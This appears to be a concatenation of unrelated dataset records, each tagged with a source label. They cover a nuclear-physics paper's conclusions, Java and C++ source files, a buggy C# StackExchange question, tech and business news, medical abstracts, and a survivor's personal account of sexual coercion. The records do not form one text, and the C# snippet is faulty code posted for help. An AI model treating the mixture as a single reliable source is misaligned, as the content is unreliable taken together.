In a second step this $V_{low-k}(\rho)$ is used in SCGF calculations at the corresponding density. Energies resulting from such model space calculations using $V_{low-k}(\rho)$ are presented in Fig. \[fig:becd2\]. The comparison of the various calculations within the model space exhibits the same features as discussed above for the original $V_{low-k}$. The correlation within the model space provide a substantial reduction of the energy as can be seen from the comparison of the self-consistent $T$-matrix approach with the Hartree-Fock results. The approach treating correlations up to second order in $V_{low-k}(\rho)$ yields energies which are very close to the complete $T$-matrix approach.
The density dependence of the effective interaction $V_{low-k}(\rho)$ yields a significant improvement for the comparison between the model space calculations and the SCGF calculation using the bare CD-Bonn interaction. Note that the energy scale has been adjusted going from Fig. \[fig:becd1\] to Fig. \[fig:becd2\]. The discrepancy remaining at densities above $\rho_0$ might be due to the effects of the Pauli quenching, which are not included in $V_{low-k}(\rho)$. These deviations could also originate from the simple parameterization of the dispersive quenching in $V_{low-k}(\rho)$.
Our investigations also provide the possibility to explore the effects of correlations evaluated within the model space using the effective interaction $V_{low-k}$. We can furthermore compare these correlation effects with the corresponding effects determined by the bare interaction in the unrestricted space. As a first example, we discuss the imaginary part of the self-energy calculates at the empirical saturation density $\rho_0$ for various nucleon momenta $p$ as displayed in Fig. \[fig:im10\]. The calculations within the model space reproduce the results of the unrestricted calculations with a good accuracy in the energy interval for $\omega$ ranging between 50 MeV below and 50 MeV above the chemical potential $\mu$. The remaining differences around the Fermi energy can be attributed to the difference in the effective masses obtained using the $V_{low-k}$ and the bare potential [@wi98]. The agreement between the $T$-matrix results around $\omega=\mu$ using the two potentials is improved if one rescales by the ratio of the effective masses. The imaginary part calculated with $V_{low-k}$, however, is much smaller than the corresponding result obtained for the bare interaction at energies $\omega -\mu$ above 100 MeV. Furthermore the model space calculation do not reproduce the imaginary part for energies below the chemical potential at momenta $k$ above 400 MeV/c.
![(Color online) Imaginary part of the self-energy as a function of the energy $\omega$ for various momenta $p$ as indicated in the panels (see Eq. ( )). The results have been determined for the empirical saturation density $\rho_0$; using $V_{low-k}$ in the $T$-matrix approximation (solid line), using $V_{low-k}$ in the second order approximation (dashed-dotted line), and employing CD-Bonn interaction in the $T$-matrix approximation (dotted line). The dashed line in the first panel denotes the results of the $T$-matrix calculation with the CD-Bonn potential rescaled by the ratio of the effective masses at the Fermi momentum obtained with the $V_{low-k}$ and the bare CD-Bonn potential. []{data-label="fig:im10"}](im10.eps){width="10.5cm"}
The imaginary part of the self-energy is a very important ingredient for the evaluation of the spectral function $A(k,\omega )$ and therefore also for the calculation of the occupation probability $n(k)$ (see Eq. (\[occupation\])). The small values for the imaginary part of the self-energy at high momenta $k$ and negative energies $\omega -\mu$ leads to occupation probabilities at these momenta, which are much smaller than the corresponding predictions derived from bare realistic NN interactions as can be seen from Fig. \[fig:nofk\]. This missing strength in the prediction of $V_{low-k}$ at high momenta is accompanied by larger occupation probabilities at low momenta. The self-consistent $T$-matrix approximation using CD-Bonn yields an occupation probability at $k=0$ of 0.897, while the corresponding number using $V_{low-k}$ is 0.920. At this density, the calculation including only terms up to second order in $V_{low-k}$ yields a rather good approximation to the self-consistent $T$-matrix approximation within the model space.
![(Color online) Momentum distribution $n(k)$ (see Eq. ()) calculated for nuclear matter at the empirical saturation density $\rho_0$. Results of the $T$-matrix approximation within the model space (solid line) are compared to results of the second order approximation (dashed-dotted line) and the $T$-matrix approximation (dotted line) in the unrestricted space.[]{data-label="fig:nofk"}](nofk.eps){width="10.5cm"}
As a second example we consider the imaginary part of the self-energy calculated at a lower density $\rho=0.4\times \rho_0$. The results displayed in Fig. \[fig:im04\] refer to nucleons with momentum $k=0$. Also at this density we find that the imaginary part evaluated with $V_{low-k}$ drops to zero at large positive energies much faster than the predictions derived from the bare interaction (see upper panel on the left in Fig. \[fig:im04\]).
It is worth noting, that at this low density the second order approximation is not such a good approximation to the full $T$-matrix approach as it is for the higher densities. Characteristic differences between the dashed-dotted and the solid line show up at energies $\omega$ close to the chemical potential. In order to trace the origin of these differences we display in Fig. \[fig:im04\] the contributions of various partial waves of NN interaction channels to this imaginary part. It turns out that the differences are largest in the $^3S_1-^3D_1$ and the $^1S_0$ channels. This means that the perturbative approach is not very successful in those two channels which tend to form quasi-bound states. In these channels all particle-particle hole-hole ladders have to be summed up to obtain the pairing solution. Note, that the pairing solutions are suppressed at higher densities, if the effects of short-range correlations are properly taken into account[@bozek4; @muwi05].
Furthermore we would like to point out that a different scale is used in the two lower panels of Fig. \[fig:im04\]. Taking this into account it is evident from this figure that the main contribution to the imaginary part of the self-energy, and that means the main contribution to the character of the deviation of the spectral function from the mean-field approach originates from the NN interaction in the $^3S_1-^3D_1$ channel.
![Imaginary part of the self-energy as a function of the energy $\omega$ for nucleons with momentum $k=0$ calculated at the density $\rho=0.4\times
\rho_0$. Results of the $T$-matrix approach (solid line) and the second order approximation (dashed-dotted line) within the model space are compared to results obtained in the unrestricted calculation (dotted line).[]{data-label="fig:im04"}](im04all.eps){width="10.5cm"}
Conclusions
===========
During the last few years it has become very popular to perform nuclear structure calculations using effective low-momentum NN interactions. These $V_{low-k}$ interactions are based on a realistic model of the NN interaction. They are constructed to be different from zero only within a model space defined by a cut-off $\Lambda$ in the relative momenta of the interacting nucleons. Within this model space they reproduce the NN data of the underlying bare interaction, although the many-body solutions may show differences with different starting NN interactions.
For this study we performed Self-Consistent Greens Functions (SCGF) calculations of symmetric nuclear matter employing $V_{low-k}$ effective interactions as well as the bare CD Bonn interaction they are based on. Special attention was paid to the correlations which can be described within this model space as compared to correlations predicted by the underlying interaction within the unrestricted space.
Using a cut-off $\Lambda$ = 2 fm$^{-1}$ we find that the spectral distribution of the single-particle strength in an energy window of plus minus 50 MeV around the Fermi energy is rather well reproduced by the calculation using $V_{low-k}$. The effective interaction $V_{low-k}$ is softer than typical realistic NN interactions. Therefore for many observables it is sufficient to approximate the full in-medium scattering matrix $T$ by the approximation including terms up to second order in $V_{low-k}$. This justifies the use of the resummed effective interaction in many-body approximations that do not the include ladder-diagram resummation. Special attention must be paid to nuclear systems at smaller densities: the possible formation of quasi-bound states may require the non-perturbative treatment of the NN scattering in the medium. This also has implications for the use of $V_{low-k}$ in studies of weakly bound nuclear systems.
The model space approach cannot reproduce correlation effects, which lead to spectral strength at high energies and high momenta. For nuclear matter at the empirical saturation density $\rho_0$ the momentum distribution is reliably predicted up to a momentum of 400 MeV/c.
The $V_{low-k}$ approach overestimates the binding energy per nucleon at high densities. Therefore we introduced a density-dependent effective interaction $V_{low-k}(\rho)$ which we constructed along the same line as the original $V_{low-k}$. The new effective interaction accounts for a dispersive correction of the single-particle propagator in the medium. This improves the behavior of the effective interaction significantly. For densities above $\rho_0$, however, the binding energies calculated with $V_{low-k}(\rho)$ are still too large. This might be improved by determining effective three-nucleon forces explicitly from the underlying bare interaction.
This work is supported in part by the Polish State Committee for Scientific Research Grant No. 2P03B05925U.S, the Department of Energy under Contract Number DE-AC05-00OR22725 with UT-Battelle, LLC (Oak Ridge National Laboratory) and the Deutsche Forschungsgemeinschaft (SFB 382).
[99]{} R. Machleidt, F. Sammarruca, and Y. Song, Phys. Rev. C **53**, [R1483]{} (1996). R.B. Wiringa, V.G.J. Stoks, and R. Schiavilla, Phys. Rev. C **51**, 38 (1995). V.G.J. Stoks, R.A.M. Klomp, C.P.F. Terheggen, and J.J. de Swart, Phys. Rev. C **49**, 2950 (1994). D. R. Entem and R. Machleidt, Phys. Rev. C [**68**]{}, 41001(R) (2003). H. Müther and A. Polls, Prog. Part. Nucl. Phys. **45**, [243]{}[(2000)]{}. H. Müther and A. Polls, Phys. Rev. C **61**, 014304 (2000). M.F. van Batenburg, Ph.D. Thesis, University of Utrecht (2001). B.E. Vonderfecht, W.H. Dickhoff, A. Polls, and A. Ramos, Phys. Rev. C **44**, R1265 (1991). D. Rohe, *et al.*, Phys. Rev. Lett. **93**, 182501 (2004). H. M[ü]{}ther and W.H. Dickhoff, Phys. Rev. C **49**, R17 (1994). T. Frick and H. M[ü]{}ther, Phys. Rev. C **68**, 034310 (2003). D.J. Dean, T. Engeland, M. Hjorth-Jensen, M. Kartamychev, and E. Osnes, Prog. Part. Nucl. Phys. **53**, 419 (2004). Z.Y. Ma and T.T.S. Kuo, Phys. Lett. **127B**, 137 (1983). H.Q. Song and T.T.S. Kuo, Phys. Rev. C **43**, 2883 (1991). T.T.S. Kuo and Y. Tzeng, Int. J. of Mod. Phys. E **3**, 523 (1994). B.H. Brandow, Rev. Mod. Phys. **39**, 771 (1967). T.T.S. Kuo, S.Y. Lee, and K.F. Ratcliff, Nucl. Phys. **A 176**, 65 (1971). A. Polls, H. Müther, A. Faessler, T.T.S. Kuo, and E. Osnes, Nucl. Phys. **A 401**, 124 (1983). H. Müther, A. Polls, and T.T.S. Kuo, Nucl. Phys. **A 435**, 548 (1985). S.K. Bogner, T.T.S. Kuo, and A. Schwenk, Phys. Rep. **386**, 1 (2003). D.J. Dean and M. Hjorth-Jensen, Phys. Rev. C69, 54320 (2004). L. Coraggio, N. Itaco, A. Covello, A. Gargano, and T.T.S. Kuo, Phys. Rev. C **68**, 034320 (2003). J. Kuckei, F. Montani, H. Müther, and A. Sedrakian, Nucl. Phys. **A 723**, 32 (2003). J. Decharge and D. Gogny, Phys. Rev. C **21**, 1568 (1980). A. Sedrakian, T.T.S. Kuo, H. Müther, and P. Schuck, Phys. Lett. **B 576**, 68 (2003). S.K. Bogner, A. Schwenk, R.J. Furnstahl, and A. Nogga, Nucl. Phys. **A 763**, 59 (2005). K. Suzuki, Prog. Theoret. Phys. **68**, 246 (1982). K. Suzuki and R. Okamoto, Prog. Theor. Phys. **92**, 1045 (1994). H. Kumagai, K. Suzuki, and R. Okamoto, Prog. Theor. Phys. **97**, 1023 (1997). S. Fujii, R. Okamoto, and K. Suzuki, Phys. Rev. C **69**, 034328 (2004). R. Roth, P. Papakonstantinou, N. Paar, H. Hergert, T. Neff, and H. Feldmeier, preprint nucl-th/0510036. P. Bo[ż]{}ek and P. Czerski, Eur. Phys. J. A **11**, 271 (2001). P. Bo[ż]{}ek, Phys. Rev. C **65**, 054306 (2002). P. Bo[ż]{}ek, Eur. Phys. J. A **15**, 325 (2002). Y. Dewulf, W.H. Dickhoff,D. Van Neck, E.R. Stoddard, and M. Waroquier, Phys. Rev. Lett **90**, 152501 (2003). W. H. Dickhoff and E. P. Roth, Acta Phys. Pol. B **33**, 65 (2002); E. P. Roth, Ph.D. thesis Washington University, St. Louis (2000). T. Frick, H. M[ü]{}ther, A. Rios, A. Polls, and A. Ramos, Phys. Rev. C **71**, 014313 (2005). K. Suzuki, Prog. Theor. Phys. **68**, 246 (1982). W.H. Dickhoff and D. Van Neck, *Many-Body Theory Exposed!* (World Scientific, Singapore, 2005). P. Bożek, Phys. Rev. C [**59**]{}, 2619 (1999). L. P. Kadanoff and G. Baym, *Quantum Statistical Mechanics* (Benjamin, New York, 1962). E. Schiller, H. Müther, and P. Czerski, Phys. Rev. C **59**, 2934 (1999). N.M. Hugenholtz and L. Van Hove, Physica **24**, 363 (1958). W.H. Dickhoff, Phys. Rev. C [**58**]{}, 2807 (1998). P. Bożek, Phys. Lett. B [**551**]{}, 93 (2003). H. Müther and W.H. Dickhoff, Phys. Rev. C **72**, 054313 (2005).
[^1]: Electronic address : piotr.bozek@ifj.edu.pl
[^2]: Electronic address : deandj@ornl.gov
[^3]: Electronic address : herbert.muether@uni-tuebingen.de
|
{
"pile_set_name": "ArXiv"
}
|
As you likely know, Marny is coming out around the end of September! If you’re an eager reader, and want a copy to devour before Marny officially comes out, you might want to apply to become a VIP ARC Reader!
If you’ve reviewed one of my books before and are interested in an ARC of Marny, please fill out this form to get a copy to review before the book is published! You’ll be an official member of my VIP Review Team.
JOIN MY NEWSLETTER!
Be among the first to find out about new fantasy releases, special announcements, and reader perks. Plus get free reads when you sign up! Your privacy is respected, I never share your email and I never spam.
|
{
"pile_set_name": "Pile-CC"
}
|
/*
* Copyright 2014 MovingBlocks
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.terasology.logic.location;
import com.google.common.collect.Lists;
import org.joml.Quaternionf;
import org.joml.Quaternionfc;
import org.joml.Vector3fc;
import org.terasology.entitySystem.Component;
import org.terasology.entitySystem.entity.EntityRef;
import org.terasology.math.Direction;
import org.terasology.math.JomlUtil;
import org.terasology.math.geom.Quat4f;
import org.terasology.math.geom.Vector3f;
import org.terasology.network.Replicate;
import org.terasology.network.ReplicationCheck;
import org.terasology.nui.properties.TextField;
import org.terasology.reflection.metadata.FieldMetadata;
import java.util.Collection;
import java.util.List;
import java.util.Objects;
/**
* Component represent the location and facing of an entity in the world
*
*/
public final class LocationComponent implements Component, ReplicationCheck {
public boolean replicateChanges = true;
// Relative to
@Replicate
EntityRef parent = EntityRef.NULL;
@Replicate
List<EntityRef> children = Lists.newArrayList();
// Standard position/rotation
@Replicate
@TextField
Vector3f position = new Vector3f();
@Replicate
Quat4f rotation = new Quat4f(0, 0, 0, 1);
@Replicate
float scale = 1.0f;
@Replicate
Vector3f lastPosition = new Vector3f();
@Replicate
Quat4f lastRotation = new Quat4f(0, 0, 0, 1);
public LocationComponent() {
}
public LocationComponent(Vector3f position) {
setLocalPosition(position);
}
/**
* @return local rotation of location component
*
* TODO: make this readonly Quaternionfc -- Michael Pollind
*/
public Quat4f getLocalRotation() {
return rotation;
}
/**
* @param newQuat
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #setLocalRotation(Quaternionfc)}.
*/
@Deprecated
public void setLocalRotation(Quat4f newQuat) {
lastRotation.set(rotation);
rotation.set(newQuat);
}
/**
* set the current local rotation of the component
*
* @param rot local rotation
*/
public void setLocalRotation(Quaternionfc rot) {
lastRotation.set(rotation);
rotation.set(JomlUtil.from(rot));
}
/**
* @return The position of this component relative to any parent. Can be directly modified to update the component
* TODO: make this readonly Vector3fc -- Michael Pollind
*/
public Vector3f getLocalPosition() {
return position;
}
/**
* @param pos
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #setLocalPosition(Vector3fc)}.
*/
@Deprecated
public void setLocalPosition(Vector3f pos) {
lastPosition.set(position);
position.set(pos);
}
/**
* the local position of this location component
*
* @param pos position to set
*/
public void setLocalPosition(Vector3fc pos) {
lastPosition.set(position);
position.set(JomlUtil.from(pos));
}
/**
* @return
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #getLocalDirection(org.joml.Vector3f)}.
*/
@Deprecated
public Vector3f getLocalDirection() {
Vector3f result = Direction.FORWARD.getVector3f();
getLocalRotation().rotate(result, result);
return result;
}
/**
* gets the local direction of the given entity in
*
* @param dest will hold the result
* @return dest
*/
public org.joml.Vector3f getLocalDirection(org.joml.Vector3f dest) {
return dest.set(Direction.FORWARD.asVector3i()).rotate(JomlUtil.from(getLocalRotation()));
}
/**
* set the local scale
* @param value the scale
*/
public void setLocalScale(float value) {
this.scale = value;
}
/**
* local scale
* @return the scale
*/
public float getLocalScale() {
return scale;
}
/**
* @return A new vector containing the world location.
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #getWorldPosition(org.joml.Vector3f)}.
*/
@Deprecated
public Vector3f getWorldPosition() {
return getWorldPosition(new Vector3f());
}
/**
* @param output
* @return
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #getWorldPosition(org.joml.Vector3f)}.
*/
@Deprecated
public Vector3f getWorldPosition(Vector3f output) {
output.set(JomlUtil.from(getWorldPosition(new org.joml.Vector3f())));
return output;
}
/**
* get the world position
*
* @param dest will hold the result
* @return dest
*/
public org.joml.Vector3f getWorldPosition(org.joml.Vector3f dest) {
dest.set(JomlUtil.from(position));
LocationComponent parentLoc = parent.getComponent(LocationComponent.class);
while (parentLoc != null) {
dest.mul(parentLoc.scale);
dest.rotate(JomlUtil.from(parentLoc.getLocalRotation()));
dest.add(JomlUtil.from(parentLoc.position));
parentLoc = parentLoc.parent.getComponent(LocationComponent.class);
}
return dest;
}
/**
* Populates out with the transform of this entity relative to the given entity, or the world transform if entity
* is not in this entity's parent hierarchy
* @param out
* @param entity
*/
public void getRelativeTransform(org.terasology.math.geom.Matrix4f out, EntityRef entity) {
if (!(entity.equals(parent))) {
LocationComponent loc = parent.getComponent(LocationComponent.class);
if (loc != null) {
loc.getRelativeTransform(out, entity);
}
}
out.mul(new org.terasology.math.geom.Matrix4f(rotation, position, scale));
}
/**
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #getWorldDirection(org.joml.Vector3f)}.
*/
@Deprecated
public Vector3f getWorldDirection() {
Vector3f result = Direction.FORWARD.getVector3f();
getWorldRotation().rotate(result, result);
return result;
}
public org.joml.Vector3f getWorldDirection(org.joml.Vector3f dest) {
return dest.set(Direction.FORWARD.asVector3f()).rotate(JomlUtil.from(getWorldRotation()));
}
/**
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #getWorldRotation(Quaternionf)}.
*/
@Deprecated
public Quat4f getWorldRotation() {
return getWorldRotation(new Quat4f(0, 0, 0, 1));
}
/**
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #getWorldRotation(Quaternionf)}.
*/
@Deprecated
public Quat4f getWorldRotation(Quat4f output) {
output.set(JomlUtil.from(getWorldRotation(new Quaternionf())));
return output;
}
/**
* get the current world rotation of the location component
*
* @param dest will hold the result
* @return dest
*/
public Quaternionf getWorldRotation(Quaternionf dest) {
dest.set(JomlUtil.from(rotation));
LocationComponent parentLoc = parent.getComponent(LocationComponent.class);
while (parentLoc != null) {
dest.premul(JomlUtil.from(parentLoc.rotation));
parentLoc = parentLoc.parent.getComponent(LocationComponent.class);
}
return dest;
}
public float getWorldScale() {
float result = scale;
LocationComponent parentLoc = parent.getComponent(LocationComponent.class);
while (parentLoc != null) {
result *= parentLoc.getLocalScale();
parentLoc = parentLoc.parent.getComponent(LocationComponent.class);
}
return result;
}
/**
* @param value
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #setWorldPosition(Vector3fc)}.
*/
@Deprecated
public void setWorldPosition(Vector3f value) {
this.setWorldPosition(JomlUtil.from(value));
}
/**
* set the world position of the {@link LocationComponent}
*
* @param pos position to set
*/
public void setWorldPosition(Vector3fc pos) {
setLocalPosition(pos);
LocationComponent parentLoc = parent.getComponent(LocationComponent.class);
if (parentLoc != null) {
this.position.sub(parentLoc.getWorldPosition());
this.position.scale(1f / parentLoc.getWorldScale());
Quat4f rot = new Quat4f(0, 0, 0, 1);
rot.inverse(parentLoc.getWorldRotation());
rot.rotate(this.position, this.position);
}
}
/**
* set the world rotation of the {@link LocationComponent}
*
* @param value
* @deprecated This is scheduled for removal in an upcoming version method will be replaced with JOML implementation
* {@link #setWorldRotation(Quaternionfc)}.
*/
@Deprecated
public void setWorldRotation(Quat4f value) {
this.setWorldRotation(JomlUtil.from(value));
}
/**
* set the world rotation of the {@link LocationComponent}
*
* @param value position to set
*/
public void setWorldRotation(Quaternionfc value) {
setLocalRotation(value);
LocationComponent parentLoc = parent.getComponent(LocationComponent.class);
if (parentLoc != null) {
Quat4f worldRot = parentLoc.getWorldRotation();
worldRot.inverse();
this.rotation.mul(worldRot, this.rotation);
}
}
public void setWorldScale(float value) {
this.scale = value;
LocationComponent parentLoc = parent.getComponent(LocationComponent.class);
if (parentLoc != null) {
this.scale /= parentLoc.getWorldScale();
}
}
public EntityRef getParent() {
return parent;
}
public Collection<EntityRef> getChildren() {
return children;
}
@Override
public boolean equals(Object o) {
if (this == o) {
return true;
}
if (o instanceof LocationComponent) {
LocationComponent other = (LocationComponent) o;
return other.scale == scale && Objects.equals(parent, other.parent) && Objects.equals(position, other.position) && Objects.equals(rotation, other.rotation);
}
return false;
}
@Override
public int hashCode() {
return Objects.hash(position, rotation, scale, parent);
}
@Override
public boolean shouldReplicate(FieldMetadata<?, ?> field, boolean initial, boolean toOwner) {
return initial || replicateChanges;
}
}
|
{
"pile_set_name": "Github"
}
|
Tw/cw: rape, survivor thoughts, sex
I often complain about not having sex in so long but sometimes I know I really want intimacy and not necessarily sex and definitely not penetrative sex. Sometimes I think about penetrative sex with cis men and cis men’s desires and it makes me sick. Like literally grossed out. I’m like you want to stick your what in my what? I dunno. It makes me feel so childish but just it often makes me call back to all the cis men who’ve wanted to do just that and did so without my permission or consent. And like men in generals desires are often just so disgusting, like ew. Like for me I’m realizing that sex and rape look very much the same for me. So separating the two can often be hard. Like I’ve had sex in the same ways I’ve been raped and I’ve been raped in the same ways I’ve had sex. And it’s a hard reality to come to terms with. It’s been so hard to call myself a survivor because most of my rape was done through coercion and the fear of violence but not the actual presence of violence (I’ve never been hit or harmed for sex though I do believe their has been a threat of violence to myself or loved ones when I was young that I’ve blocked out). But the reality is, any instance I said no and then was convinced otherwise or berated otherwise, anytime the man was significantly older than me and pursued me first, anytime alcohol and/or weed and money was used as incentive to loosen guards to make consent blurry and impossible is all rape. And like I get so sad and ashamed and disgusted when I think of all the times that I could call that as happening to me. And like even before I ever had sex, unwanted sexual contact on the part of boys my age and men older than me. Like it’s all a hot mess. And a lot of that sex that was also rape was not much different than consentual sex in the ways it is done and performed. And than the shame and disgust I feel for going back to one of my rapists and having sex with them and the feelings of sexual arousal that still came with most of the experiences. Most didn’t hurt. Most felt alright. Some even good sometimes. But not how or what I wanted. And it’s a big messy problem I’m trying to figure out. It makes my entire sexual life a mess even though I barely have one. Even masturbating is hard and my meds make it hard as fuck to bust a nut. I don’t know where I’m going with all this but I needed to get it off of my chest and out of me even though I’ll still be feeling this a lot for a long time.
|
{
"pile_set_name": "OpenWebText2"
}
|
{#sp1 .494}
{#sp2 .495}
{#sp3 .496}
{#sp4 .497}
{#sp5 .498}
{#sp6 .499}
{#sp7 .500}
{#sp8 .501}
{#sp9 .502}
{#sp10 .503}
{#sp11 .504}
{#sp12 .505}
{#sp13 .506}
{#sp14 .507}
{#sp15 .508}
{#sp16 .509}
{#sp17 .510}
{#sp18 .511}
{#sp19 .512}
{#sp20 .513}
{#sp21 .514}
{#sp22 .515}
{#sp23 .516}
|
{
"pile_set_name": "PubMed Central"
}
|
/* ============================================================
*
* This file is a part of digiKam project
* https://www.digikam.org
*
* Date : 2007-02-06
* Description : Setup view panel for dplugins.
*
* Copyright (C) 2018-2019 by Gilles Caulier <caulier dot gilles at gmail dot com>
*
* This program is free software; you can redistribute it
* and/or modify it under the terms of the GNU General
* Public License as published by the Free Software Foundation;
* either version 2, or (at your option)
* any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* ============================================================ */
#ifndef DIGIKAM_SETUP_PLUGINS_H
#define DIGIKAM_SETUP_PLUGINS_H
// Qt includes
#include <QScrollArea>
namespace Digikam
{
class SetupPlugins : public QScrollArea
{
Q_OBJECT
public:
enum PluginTab
{
Generic = 0,
Editor,
Bqm
};
public:
explicit SetupPlugins(QWidget* const parent = nullptr);
~SetupPlugins();
void applySettings();
private:
class Private;
Private* const d;
};
} // namespace Digikam
#endif // DIGIKAM_SETUP_PLUGINS_H
|
{
"pile_set_name": "Github"
}
|
Monday, May 5, 2008
Cisco official says Africa needs 1.3 million IT pros
The old saying that success is when preparation converges with opportunity. Sadly relatively few African-Americans are prepared to take up this challenge, traveling with their IT skills in hand to benefit these people as they hit the ground running.
This news will cause me to redouble my efforts to get more young people into the Open Source development project that I have in mind.
Africa requires 1.3 million network professionals by 2012 for technology in the region to operate effectively, according to a Cisco official.
South Africa-based Cisco Systems area academic manager Elfie Hamid said in Lusaka, Zambia, on Thursday that Africa is facing a massive shortage of ICT, both in industry and training institutions. To make effective use of ICT, Africa needs to train 1.3 million professionals in the region in the next four years, he said.
Cisco is holding its annual conference here for all of its network academies in Southern Africa, including Zambia, South Africa, Botswana, Namibia and Malawi.
"Cisco targeted the Southern Africa Development Community (SADC) so that new ideas and experiences could be shared on how to improve IT systems in the region," said Hamid at the conference earlier this week.
|
{
"pile_set_name": "Pile-CC"
}
|
Tweetbot for Mac — It's finally here! (sort of) — Tweetbot for Mac is finally available! However it may not be quite as you had hoped. Developing for the Mac is no easy task, especially a full-featured Twitter client. However, we've gotten to a point where while not complete, it is useable.
Judge refuses to block Diller's Aereo online TV venture — (Reuters) - A federal judge has rejected a bid by major U.S. broadcasters to stop Aereo Inc, an online television venture backed by billionaire Barry Diller, to stop rebroadcasting some of its programming over the Internet.
Twitter's Pitch Deck for Big Advertisers (Slides) — Twitter's ad business is looking less like an experiment and more like a real business, one that could generate $1 billion a year in the not-too-distant future. — If Twitter ads really take off, it will be because CEO Dick Costolo …
Overhauling mobile.twitter.com from the ground up — Twitter is all about making real-time information available to everyone, everywhere. In order to reach every person on the planet we recently released an update to mobile.twitter.com for feature phones and older browsers.
Facebook Groups Start Showing Exactly Who Saw Each Post — No need to wonder if your family saw that reminder about dinner or if co-workers noticed you uploaded a PowerPoint, as Facebook Groups will soon display a count and a list of names of who saw each post. For example: “Seen by 2″, and when hovered “Josh Constine |
Facebook wants to be your online bank — The social media giant is quietly supporting new services for banks that want to engage socially with their customers: The decidedly unsocial business of online banking. — FORTUNE — Someday soon, Facebook users may pay their utility bills …
Dropbox gifts early users free premium subscriptions — Dropbox is thanking its most loyal customers by no longer charging them for their premium subscriptions. It started emailing its “earliest Dropbox users” recently to inform them of the news: … It seems that a small group of early users …
Android 4.1 Jelly Bean ported to the Kindle Fire — The Amazon Kindle Fire ships with a custom version of Android 2.3 Gingerbread designed to run apps and access digital media from Amazon's content store. But users have been hacking the Kindle Fire since the day it was released …
Who's afraid of Google fiber? Time Warner for starters. — Apparently, Time Warner Cable and I have something in common — we both want to figure out the details on Google's fiber-to-the-home deployment in Kansas City. Time Warner Cable, one of the ISPs providing broadband access in Kansas City …
The Traveling Data Dystopia — It seems that everyone likes to talk about “disconnecting” when they travel. That is, they want to get away from checking Twitter, Facebook, Instagram, Path, etc, while they're away. That's great. I'm pretty much the opposite.
|
{
"pile_set_name": "Pile-CC"
}
|
Q:
using radio buttons to do some basic maths
i am making a program that will calculate how much someone needs to pay if they have had there vehicle parked. I am trying to use radio buttons to select the type of vehicle. when cars(radiobutton1) is selected the algorithm works but when trucks (radiobutton2)is selected it will not work. here is my code
// cars
if (radioButton1.Checked == true)
{
int hac = Convert.ToInt16(txthrs.Text);
int h1c = 5;
int h2c = 3;
if (txthrs.Text == "1") ;
money.Text = h1c.ToString();
if (hac < 1) ;
money.Text = (h1c + (hac - 1) * h2c).ToString();
// end of cars
// trucks
if (radioButton2.Checked == true)
{
int hat = Convert.ToInt16(txthrs.Text);
int h1t = 6;
decimal h2t = 3.5m;
if (txthrs.Text == "1") ;
money.Text = h1t.ToString();
if (hat < 1) ;
money.Text = (h1t + (hat - 1) * h2t).ToString();
}
}
}
}
}
A:
You have nested your if statements, the second if statement will only execute if radio button one is checked. Move the second if block out of the first.
|
{
"pile_set_name": "StackExchange"
}
|
Whole Body Metabolic Tumor Volume and Total Lesion Glycolysis Predict Survival in Patients with Adrenocortical Carcinoma.
Adrenocortical carcinoma (ACC) is a rare but lethal malignancy with few reliable prognostic markers. FDG-PET metabolic parameters have been shown to predict survival in several cancers. The objective was to determine if metabolic tumor volume (MTV), total lesion glycolysis (TLG), and maximum standardized uptake value (SUVmax) could serve as prognostic markers in patients with ACC. A total of 30 patients with ACC prospectively underwent 18F-FDG PET/CT prior to treatment. Whole body MTV, TLG, and SUVmax were measured by a semiautomatic method. A median cutoff was used to determine an association with overall survival (OS) from the time of 18F-FDG PET/CT by the Kaplan-Meier method. Patients with high whole body MTV (>87.0 mL),TLG (>229.4 SUVlbm*mL), or SUVmax (>8.9 SUV) had a worse OS compared with those with low whole body MTV (median OS, 24 vs 45.1 months, p < .01), TLG (median OS, 24 vs 40.3 months, p < .005), or SUVmax (median OS, 23.7 vs 35.5 months, p < .02). In patients who had operable disease (n = 23), high whole body MTV (>87.0 mL) and TLG (>229.4 SUVlbm*mL) had a worse OS compared with those with low whole body MTV (median OS, 25.1 vs 45.1 months, p < .05) and TLG (median OS, 25.1 vs 40.3 months, p < .05), but a high SUVmax (>8.9 SUV) was not associated with worse OS (p = .11). Patients with ACC and a high whole body MTV, TLG, and SUVmax have a worse prognosis and OS. Measurement of whole body MTV and TLG may be helpful for guiding therapy for patients with ACC.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
WeChat launches digital tax refund service for overseas tourists
WeChat has launched a new service that enables overseas tourists to get a digital refund tax as the latest application of financial technology in various sectors.
Since Oct 1, overseas tourists can receive a tax refund through the We TaxFree Pass mini-application in WeChat, the social networking platform of the internet giant Tencent, and receive money immediately in their digital wallets, significantly simplifying the process.
In the past, they could only get the refundable tax in cash or through their bank cards.
The service has been made available in Beijing Capital International Airport.
For those who have a large amount of tax rebates in excess of 10,000 yuan ($1,415), they can now receive money immediately compared with the previous five working days on average, according to a staff member at the airport who is responsible for the tax rebate business.
Since the official launch of the service, a total of 49 tax refund deals have been made through digital payment methods at the airport, either via WeChat or Alibaba’s Alipay.
Of them, 96 percent were from WeChat, according to the company.
Post time: Nov-10-2019
Email Newsletters
For inquiries about our products or pricelist, please leave your email to us and we will be in touch within 24 hours.
|
{
"pile_set_name": "Pile-CC"
}
|
Prevalence and contributing factors of eating disorder behaviors in active duty service women in the Army, Navy, Air Force, and Marines.
